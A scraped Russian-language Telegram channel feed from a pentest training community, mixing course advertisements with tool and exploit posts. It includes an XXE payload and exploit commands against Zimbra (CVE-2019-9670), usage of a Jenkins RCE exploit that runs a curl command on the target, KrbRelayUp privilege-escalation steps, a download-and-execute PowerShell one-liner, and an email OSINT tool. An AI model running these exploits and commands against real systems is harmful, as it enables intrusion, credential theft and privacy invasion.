NETRUNNER GROUP
2.96K subscribers
268 photos
32 videos
22 files
164 links
> По вопросам обращаться @TripiniFKYL <
Заместитель - @netrunner_1G
Discord - https://discord.gg/tqmrqRYPW5
Чат - https://t.me/+tkuqqLpFQPVhM2Zi
Сайт - https://cybernetrunner.ru (ведется разработка новой платформы)
Download Telegram
Forwarded from Похек
XXE to RCE Zimbra CVE-2019-9670

Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)

Payload XXE:
 xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Ниже приведу парочку примеров, как эксплуатировать эту вулну.
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rce
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit

Arambiz - эксплойт на Python3:
 clone https://github.com/oppsec/arbimz.git
pip3 install -r requirements.txt
python3 main.py --url https://example.com/

Zaber - эксплойт на Go:
 install github.com/oppsec/zaber@latest
zaber -u https://example.com
Если у вас не находит бинарь, то пропишите абсолютный путь.
 -u https://example.com
А после работ не забудьте добавить $HOME/go/bin/ в свой PATH 😉


Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.

Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
KrbRelayUp

Оболочка для Rubeus и KrbRelay для упрощения следующих атак:
1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3. Kerberos relay to LDAP
4. Добавление привилегий RBCD и получение Service Ticket (ST) на локальной машине
5. Используя указанный ST для аутентификации в локальном Service Manager и создания нового процесса, как NT/SYSTEM
6. Kerberos relay to ADCS (HTTP)
7. Генерирование запроса на сертификат от имени учетной записи локальной машины, отправка запроса в ADCS Web Enrollment для получения сертификата для учетной записи локальной машины.
8. Генерирование нового KeyCredential и добавление его к атрибуту msDS-KeyCredentialLink учетной записи локальной машины
9. Использование полученного сертификата и KeyCredential для получения TGT для учетной записи локальной машины через PKInit
10. Использование TGT для получения Service Ticket (ST) на локальной машине через S4U2Self и TGSSUB

#tools
❤‍🔥10👍1
Forwarded from Похек
Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости

В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного выполнения кода в Foxit PDF Reader.

#CVE #RCE #моястатья
👍6🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Holehe OSINT - Email to Registered Accounts

Эффективный поиск зарегистрированных учетных записей из электронных писем. Holehe проверяет, прикреплено ли письмо к аккаунту на таких сайтах, как twitter, instagram, imgur и более чем 120 других.

Установка:
pip3 install holehe

или

git clone https://github.com/megadose/holehe.git
cd holehe/
python3 setup.py install

Holehe можно запускать из CLI и быстро встраивать в существующие python-приложения.

#tools #osint
5👍1🔥1
А теперь серьезно
Пора выходить на новый уровень 🔼

Мы меняем концепцию, углубляемся в репетиторство.

С сегодняшнего дня NetRunner начинает углублено сотрудничать с RESOLUTE ATTACK.
И мы рады заявить что их курс, после которого вы получите сертификат PRTT, на данный момент - ТОП 1 в России по пентесту.

Так как это очень серьезный курс и обычному Kiddie ("новокеку") будет очень сложно туда залететь , мы под руководством RA создаем подготовительный курс с необходимой БАЗОЙ !!!
Информации будет больше, чем мы давали ранее.
Это будет больше похоже на репетиторство, чем на обычный поточный курс.

У вас будет:
- новый ментор (и не один)
- структурированная база данных со всей нужной информацией
- занятия 2 раза в неделю

Вместе с RESOLUTE ATTACK мы взяли на себя полномочия популяризации pentest`а в СНГ и будем двигаться бок о бок.

Развивайся вместе с нами!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥25❤‍🔥9👍9
webanalyze

Это порт Wappalyzer в Go. Этот инструмент разработан с учетом производительности и позволяет тестировать огромные списки хостов.

Установка:
Установочный файл с Github

Сбилдить:
go install -v github.com/rverton/webanalyze/cmd/webanalyze@latest
webanalyze -update
webanalyze -h

Использование webanalyze:
  -apps string
-crawl int
-host string
-hosts string
-output string
-search
-silent
-update
-worker int

Docker:
git clone https://github.com/rverton/webanalyze.git
docker build -t webanalyze:latest webanalyze
docker run -it webanalyze:latest -h
6👍2
Наш любимый учитель @fir3wall1 решил вести свой пентестерский блог

Не могу вам его не порекомендовать , там будет много годного контента для +- знающих ребят.

Залетайте

#не_реклама
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍4😍4
Jenkins RCE 2019
CVE-2018-1000861
CVE-2019-1003005
CVE-2019-1003029

Использование:
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Уязвимые версии:
Jenkins 2.53
Jenkins 2.122
Jenkins 2.137
Jenkins 2.138 with ANONYMOUS_READ enable
Jenkins 2.152 with ANONYMOUS_READ enable
Jenkins 2.153 with ANONYMOUS_READ enable
Script Security Plugin 1.43
Script Security Plugin 1.48
❤‍🔥5👍4
Всем хай 👋

Хочу показать вам всего 1/3 - 1/4 подготовительного курса к PRTT который мы вам готовим ☺️

Ждите начало предпродаж на этой неделе, будет очень много годного контента ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥12👍6🔥6
Предпродажа открыта

Расскажу немного больше о курсе:
1) Вам будет постепенно и структурировано выдаваться информация. Так, что бы вы могли ее комфортно изучить.
2) Раз в неделю наши менторы будут в формате онлайн отвечать на ваши вопросы.
3) Постепенно мы перейдем на новую платформу. (сюрприз) 😁
4) Вся программа одобрена RESOLUTE ATTACK и сделана с их помощью, поэтому в качестве и актуальности информации можете не сомневаться.
5) Тем, кто продвинулся выше ступени Script-Kiddie, мы даем 10% скидку на курс 🫶 (вы реально молодцы парни)
6) Этот курс - репетиторство.
Он поможет человеку, который "ноль" в пентесте подняться до уровня успешного прохождения PRTT.

Стоимость курса: 15000р
Начало 25 мая.
Рассчитан он на 3 месяца, поэтому есть вариант оплаты по месяцам.

Ответы на вопросы:
Часть 1
Часть 2

По вопросам и покупке писать: @TripiniFKYL
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥75🤔3😍2
Forwarded from CyberYozh
Media is too big
VIEW IN TELEGRAM
Пентест 1С-Битрикс. Прямой эфир.
Спикер: Firewall

👍 Начало трансляции в 16:00

В рамках доклада спикер от NetRunner - (партнеров RESOLUTE ATTACK) - Firewall расскажет про способы нахождения уязвимостей без методички, атак на php скрипты разработчиков и их поиск.

🎁 В качестве приятного дополнения - так же расскажет, как обходить капчу в 1С-Битрикс.

Канал Firewall | RESOLUTE ATTACK | NetRunner
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥6👍3❤‍🔥2
У меня скопилось довольно много повторяющихся вопросов, поэтому вот ответы на них:

1) Будет ли этот курс заменять старую программу обучения?

Да, будет, и информации будет больше. В целом, мы в 3 месяца уложили довольно много материала.

2) Сколько будет домашних заданий. И будут ли они вообще?

Вам предстоит сделать 24 домашних задания, которые наши менторы любезно проверят, и дадут оценку или скажут что исправить.

3) Будут-ли какие то бонусы, привилегии ученикам?

Не назвал бы это большой привилегией, но тем, кто до начала полностью оплатит курс, мы выдадим больше домашних заданий просто в качестве бонуса.
Если мы еще что-то надумаем, то обязательно напишу.

4) Когда будут проходить стримы и во сколько?

Предварительно стримы, где мы будем отвечать на ваши вопросы, будут проходить по субботам, в районе вечера или чуть раньше по МСК.

5) Готов ли у вас этот курс, или вы еще его делаете?

Курс полностью готов, мы рано начади предпродажу, так как не ожидали на это такого спроса, в связи с этим хочу добавить, что лучше записываться заранее, чем раньше, тем лучше.
Можем закрыть набор, когда наберется достаточное количество человек.

6) Нужно ли что-то учить до начала курса?

Нет, и еще раз нет, этот курс рассчитан на полных "нулей" в ИБ и для тех, кто имеет неполноценную базу со знаниями.

Завтра сделаю еще пост, где отвечу на остальные частые вопросы 🔼
Писать: @TripiniFKYL
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥7👍5🔥4
Ответы на частые вопросы
Часть 2

1) Что если, я не буду успевать осваивать программу?

У вас останется вся база с информацией, методички и так далее. Так же, вы не потеряете связь с менторами.
Можете осваивать программу в удобном вам темпе.

2) Что если, я из другой страны и не могу оплатить?

Можно оплатить криптой. Есть разные варианты, пишите не стесняйтесь, подскажу)

3) Куда делается наиболее большой упор в программе?

Упор в web пентест, а также на приобретение базовых навыков, чтобы было хорошие понимание и хороший скилл в этой сфере. Так как курс рассчитан даже если знаний совсем нет.

4) Что я буду уметь после прохождения курса?

• Администрировать Linux сервера.
• Администрировать Web сервера.
• Проводить web пентест и анализ защищённости информационных систем.
• Участвовать в bug-bounty программах.
• Успешно развиваться и реализовыватся в ИБ и IT сфере.
• Успешно понимать материал из курса PRTT.
• Пользоваться Kali Linux и его инструментами.
• Писать свои скрипты для автоматизации своих действий, пентеста и анализа защищённости.
• Производить атаки внутри локальной сети: mitm, dns, arp spoofing и т.д.

И многое другое.

Задавайте свои вопросы тут: @TripiniFKYL 🔼
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥7👍54
Nishang

Это фреймворк и набор скриптов, позволяющий использовать PowerShell для пентеста и red team. Nishang полезен на всех этапах тестирования на проникновение.1

#tools
👍43🔥3
Сообщество по информационной безопасности «КибХак» организует хакатон и приглашает тебя принять в нем участие!

Если ты учишься в университете или только планируешь в него поступать - мы ждем тебя!

👥 Партнеры мероприятия — Cloud и BI.ZONE
🗓 С 11 по 18 мая
📍 В формате очно/онлайн
🏫 Место проведения: РТУ МИРЭА

Что будет на хакатоне:
• Работа с облачными сервисами и технологиями
•Студентам предстоит лицом к лицу столкнуться с кейсом, затрагивающим аспекты пентеста, SOC и форензики.
• Шанс выиграть редкий и эксклюзивный мерч и проявить себя в присутствии представителей компаний-партнëров.

Зарегестрироваться можно по ссылке:
https://forms.gle/wYXbq99GtaP3L17Z9

Вступай в группу в Telegram, где будет вся актуальная информация: https://vk.cc/cnmka5
👍7🔥3
Добавляем обороты

CyberYozh – новый партнер.

Мы запланировали серию эксклюзивных статей, на канале ежей, посвященных ключевым навыкам, которые необходимы начинающим специалистам по безопасности. Автор статей – наш ментор K1ber, а это гарантия качественных материалов.

И это еще не все. Мы готовим специальный проект, который будет для вас приятным сюрпризом 🫶

Следите за каналом наших партнеров 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥12🔥8👍51
Не устану вас радовать интересными постами

Мы сделали свой шоп, в котором вы можете посмотреть, что мы можем предложить 🫶

Заходите, осваиваетесь @NetRunnerShop_Bot

P.S. Говорят на днях там появится что-то интересное)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥9😍6👍5
Forwarded from Похек (SkyNet)
​​Atomic Red Team

Всем привет! Извиняюсь, что давно не делал посты, загружен всем подряд. Постараюсь исправиться)
Я думаю многие из нас знакомы с Atomic Red Team. Но если нет, то давайте кратко пройдемся. Это некая библиотека PowerShell скриптов основанная на MITRE. Данный фреймворк предназначен не только для красной команды, но и для защитников, которые желают проверить свои же средства защиты. Этот фреймворк является самым популярным и полным "чек-листом" для проверки ИБ вашей рабочей среды.
Atomic Red Team предназначен не только для Windows, но и Linux + MacOS. Так что вы можете протестировать всё что вам нужно)

Команда для импорта тестов:
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); Install-AtomicRedTeam

Далее советую вам обратиться к этой и этой странице документации. Вы можете загрузить все тесты, но лучше конечно под конкретную операционную систему)

Пример запуска тестов:
Invoke-AtomicTest T1003.003 - просто запуск теста или группы тестов
Invoke-AtomicTest T1003.003 -TestNumbers 1,2 - вы выбрали только 1 и 2 тесты из группы
Invoke-AtomicTest T1003.003 -ShowDetails - вы сможете прочитать подробную информацию о конкретном тесте/ах

Для безумцев:
Invoke-AtomicTest All

Также советую вам посмотреть интересное видео от наших западных коллег об этом прекрасном инструменте)

#tools
👍5❤‍🔥4🔥3
Awesome One-liner Bug Bounty

В этом репозитории хранятся и размещаются различные one-liner для пентеста, собранные автором, а также внесенные сообществом. Ваш вклад и предложения приветствуются.

#awesome
👍12🔥42
JAVA

Автор: Siznik

Что думаете об этом языке программирования?
Наш новый ментор сделал для вас статью о том как просто поднять локалку на JAVA и добавить туда простейший функционал. Статья

Приятного просмотра)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥7🤔4